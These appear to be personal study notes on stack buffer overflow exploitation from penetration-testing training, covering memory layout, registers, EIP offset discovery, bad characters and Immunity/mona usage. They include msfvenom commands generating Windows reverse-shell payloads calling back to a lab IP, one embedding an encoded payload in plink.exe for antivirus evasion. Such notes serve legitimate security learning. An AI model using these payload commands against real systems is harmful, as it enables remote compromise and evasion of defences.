Buffer Overflows

+----------------------+ 
|     Kernel space     | Not Writeable
+----------------------+ 0xc0000000
|                  +   |
|      Stack       |   | RLIMIT_STACK
|                  v   |
+----------------------+
|    Memory Mapping    |
|        Segment       |
+----------------------+
|                      | Program Break
|                  ^   | (brk)
|       Heap       |   |
|                  +   |
|                      | start_brk
+----------------------+
|     BSS Segment      |
+----------------------+
|                      | end_data
|     Data Segment     |
|                      | start_data
+----------------------+ 
|                      | end_code
|     Text Segment     | Binary Code
|                      |
+----------------------+0x08048000 
+----------------------+0x00000000

Phrack - Smashing The Stack For Fun And Profit

SFP - Position in Stack before local Buffer starts. Used as relative location.

Intel Registers

+-----+-----+-----+--------------------------------
| 16b | 32b | 64b |  Description
+-----+-----+-----+--------------------------------
|  SP | ESP | RSP | Stack Pointer (SP)
|  IP | EIP | RIP | Instruction Pointer
|  BP | EBP | RBP | Base Pointer (SFP)
|  AX | EAX | RAX | Accumulator Register
|  BX | EBX | RBX | Base Register
|  CX | ECX | RCX | Counter Register
|  DX | EDX | RDX | Data Register
|  SI | ESI | RSI | Source Index 
|  DI | EDI | RDI | Destination Index
|  w  |  s  | N/A | register suffix (r8-15)

$ - Literal Number

Stack Exploitation

The stack is used to,

  • dynamically allocate the local variables used in functions
  • pass parameters to the functions
  • return values from the function
           <---- vars added in this direction (pushed) -----
           --- Data added to var -->
           [   stack frame          ]        [  Funct Args  ]
top of     DDDDDDDDEEEEEEEEEEEE  EEEE  FFFF  FFFF  FFFF  FFFF      bottom of
stack      89ABCDEF0123456789AB  CDEF  0123  4567  89AB  CDEF      stack
(lower     buffer                SFP   RET     a     b     c      (high
memory)                          (EBP)                             memory
Value)     [SSSSSSSSSSSSSSSSSSSS][SSSS][0xD8][0x01][0x02][0x03]    value)
           ^
           |--ESP
  • Stack frame - contains a function's parameters: local variables, and the data necessary to recover the previous stack frame, including the value of the instruction pointer at the time of the function call.

  • Depending on the implementation the stack will either grow down (towards lower memory addresses), or up. In our examples we'll use a stack that grows down. This is the way the stack grows on many computers including the Intel, Motorola, SPARC and MIPS processors.

  • The stack pointer (SP) is also implementation dependent.

    • It may point to the last address on the stack, or to the next free available address after the stack.
  • Memory can only be addressed in multiples of the word size.

    • A word in our case is 4 bytes, or 32 bits

function calling

  1. PUSH function paramters into the stack
  2. CALL function, this pushed the RETURN address onto the stack
  3. PUSH EBP (frame pointer) onto the stack, EBP of calling function
  4. copy ESP into EBP, set EBP of called function
  5. Do things
  6. COPY EBP into ESP
  7. POP EBP, restor old EBP
  8. POP RET Address in EIP
call_swap:
    pushl $var      ; 1.
    call swap       ; 2.

swap:
    push %ebp       ; 3.    Setup
    movl %esp, %ebp ; 4. 
    ...             ; 5.    Body
    movl %ebp, %esp ; 6.    Finish
    popl %ebp       ; 7.
    ret             ; 8.

leave instruction - is mov %ebp,%esp and pop %ebp

/usr/share/metasploit-framework/tools/exploit/nasm_shell.rb - nasm shell

root@kali:~# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb 
nasm > jmp esp
00000000 FFE4 jmp esp
nasm >

EIP

  • EIP is important to take control of it controls the program flow
  • Two methods to find where the 4 bytes that overwrite the EIP
    • binary tree analysis, keep splitting string until the mathcing 4 bytes are found
    • Create a uniquie string and find those 4 bytes in the string
    • pattern_create.rb -l len - part of metasploit that can create this kind of string
    • pattern_offset.rb -l len -q valueinhex - find where hex value is located in string

Shell code

Bad Charaters - characters that should not be included in shell code
00 - null byte, can be used to terminate strings
0D - carrage return
0A - Line feed
There are more and can be tested to see how they interact with the target. Sending a payload that includes all chars and seeing what gets filtered or ends the loading of the string

using padding 0xCC can be used to set a debug TRAP

shell-storm | Shellcodes Database

msfvenom

How to use msfvenom · rapid7/metasploit-framework Wiki · GitHub
Complete How to Guide for MSFvenom
MSFvenom - Metasploit Unleashed
Metasploit Payload cheatsheet

msfvenom -l payloads
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.180 LPORT=4444 EXITFUNC=thread -f python -b \x00\x0a\x0d
-a x86 - 32bit arch
--platform windows - set platform

  • a decoding route is added to the shell code to translate the encoded code back
  • decoder needs from space at the begining of the shell code to allow for some working space for the decoder to work in

Windows buffer overflow

  • Reverse shell payload: 350 - 400 bytes of spaces
  • shell code can live in space after the EIP the ESP should point here
  • Look for addresses in in memory that point to JMP ESP in statically linked libraries

Immunity debugger

Immunity Debugger

!mona modules - Show loaded dlls

Look for memory addresses that do not include bad chars and does not have ASLR or DEP enabled

nasm_shell.rp can be used to translate assembly to byte codes

!mona find -s "\xff\xe4" -m slmfc.dll - find all JMP ESP op codes

F2 place break point

  • may need to seach twice due to bugs

"e" in menu shows module list

Embedding exploit

  • You can embed a payload in a Windows PE binary
  • This is useful for AV evasion
    msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_emebeded.exe
  • -x source binary
  • -o output file
  • -i interations, number of times to encode the payload

Cross compiling to windows from linux

sudo apt-get install mingw-w64

# C
i686-w64-mingw32-gcc hello.c -o hello32.exe      # 32-bit
x86_64-w64-mingw32-gcc hello.c -o hello64.exe    # 64-bit

# C++
i686-w64-mingw32-g++ hello.cc -o hello32.exe     # 32-bit
x86_64-w64-mingw32-g++ hello.cc -o hello64.exe   # 64-bit

Cross Compile to Windows From Linux | ArrayFire

  • run windows bin with wine

Customizing and Fixing Exploits - 646.c - Cross compiling with mingw32 - Offensive Security Forums

HEAP exploitation

  • dynamically allocated

  • allocated/dealocated in C using

    • malloc
    • calloc
    • realloc
    • free
  • allocated/dealocated in C++

    • new
    • delete
  • memory not dynamically released, must be manually released

  • pointers to heap allocation stored in pointer variable in stack.

OS archives

https://archive.kernel.org/centos-vault/